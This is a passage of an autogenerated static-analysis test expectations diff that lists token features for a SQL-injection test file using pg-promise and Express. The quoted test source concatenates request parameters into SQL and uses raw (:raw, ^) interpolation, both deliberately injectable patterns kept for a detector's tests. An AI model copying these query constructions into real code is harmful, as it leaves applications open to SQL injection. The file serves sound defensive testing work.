one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:24:30:25 | id | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:24:30:25 | id | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:3:32:4 | db | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:3:32:4 | db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:3:32:4 | db | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:3:32:4 | db | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:3:32:4 | db | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:3:32:8 | db.one | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:3:32:8 | db.one | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:3:32:8 | db.one | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:3:32:8 | db.one | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:3:32:8 | db.one | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:3:35:4 | db.one( ... OK\\n }) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:3:35:4 | db.one( ... OK\\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:3:35:4 | db.one( ... OK\\n }) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:3:35:4 | db.one( ... OK\\n }) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:3:35:4 | db.one( ... OK\\n }) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:3:35:4 | exceptional return of db.one( ... OK\\n }) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:3:35:4 | exceptional return of db.one( ... OK\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:3:35:4 | exceptional return of db.one( ... OK\\n }) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:3:35:4 | exceptional return of db.one( ... OK\\n }) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:3:35:4 | exceptional return of db.one( ... OK\\n }) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:6:32:8 | one | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:6:32:8 | one | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:6:32:8 | one | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:6:32:8 | one | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:6:32:8 | one | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:10:35:3 | {\\n t ... OK\\n } | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:10:35:3 | {\\n t ... OK\\n } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:10:35:3 | {\\n t ... OK\\n } | calleeImports | pg-promise | @@ -3686,6 +18125,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:10:35:3 | {\\n t ... OK\\n } | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:10:35:3 | {\\n t ... OK\\n } | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:32:10:35:3 | {\\n t ... OK\\n } | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:33:5:33:8 | text | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:33:5:33:8 | text | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:33:5:33:8 | text | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:33:5:33:8 | text | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:33:5:33:8 | text | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:33:5:33:45 | text: ' ... = $1^' | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:33:5:33:45 | text: ' ... = $1^' | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:33:5:33:45 | text: ' ... = $1^' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:33:5:33:45 | text: ' ... = $1^' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:33:5:33:45 | text: ' ... = $1^' | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:33:5:33:45 | text: ' ... = $1^' | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:33:5:33:45 | text: ' ... = $1^' | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:33:5:33:45 | text: ' ... = $1^' | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:33:5:33:45 | text: ' ... = $1^' | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:33:5:33:45 | text: ' ... = $1^' | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:33:11:33:45 | 'SELECT ... = $1^' | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:33:11:33:45 | 'SELECT ... = $1^' | InputAccessPathFromCallee | 0.text | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:33:11:33:45 | 'SELECT ... = $1^' | InputArgumentIndex | 0 | @@ -3696,6 +18150,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:33:11:33:45 | 'SELECT ... = $1^' | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:33:11:33:45 | 'SELECT ... = $1^' | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:33:11:33:45 | 'SELECT ... = $1^' | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:5:34:10 | values | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:5:34:10 | values | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:5:34:10 | values | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:5:34:10 | values | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:5:34:10 | values | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:5:34:25 | values: ... rams.id | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:5:34:25 | values: ... rams.id | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:5:34:25 | values: ... rams.id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:5:34:25 | values: ... rams.id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:5:34:25 | values: ... rams.id | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:5:34:25 | values: ... rams.id | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:5:34:25 | values: ... rams.id | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:5:34:25 | values: ... rams.id | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:5:34:25 | values: ... rams.id | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:5:34:25 | values: ... rams.id | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:13:34:15 | req | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:13:34:15 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:13:34:15 | req | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:13:34:15 | req | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:13:34:15 | req | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:13:34:22 | req.params | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:13:34:22 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:13:34:22 | req.params | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:13:34:22 | req.params | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:13:34:22 | req.params | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:13:34:25 | req.params.id | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:13:34:25 | req.params.id | InputAccessPathFromCallee | 0.values | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:13:34:25 | req.params.id | InputArgumentIndex | 0 | @@ -3706,6 +18185,41 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:13:34:25 | req.params.id | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:13:34:25 | req.params.id | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:13:34:25 | req.params.id | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:17:34:22 | params | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:17:34:22 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:17:34:22 | params | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:17:34:22 | params | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:17:34:22 | params | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:24:34:25 | id | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:24:34:25 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:24:34:25 | id | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:24:34:25 | id | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:34:24:34:25 | id | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:3:36:4 | db | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:3:36:4 | db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:3:36:4 | db | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:3:36:4 | db | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:3:36:4 | db | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:3:36:8 | db.one | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:3:36:8 | db.one | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:3:36:8 | db.one | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:3:36:8 | db.one | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:3:36:8 | db.one | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:3:43:4 | db.one( ... ]\\n }) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:3:43:4 | db.one( ... ]\\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:36:3:43:4 | db.one( ... ]\\n }) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params 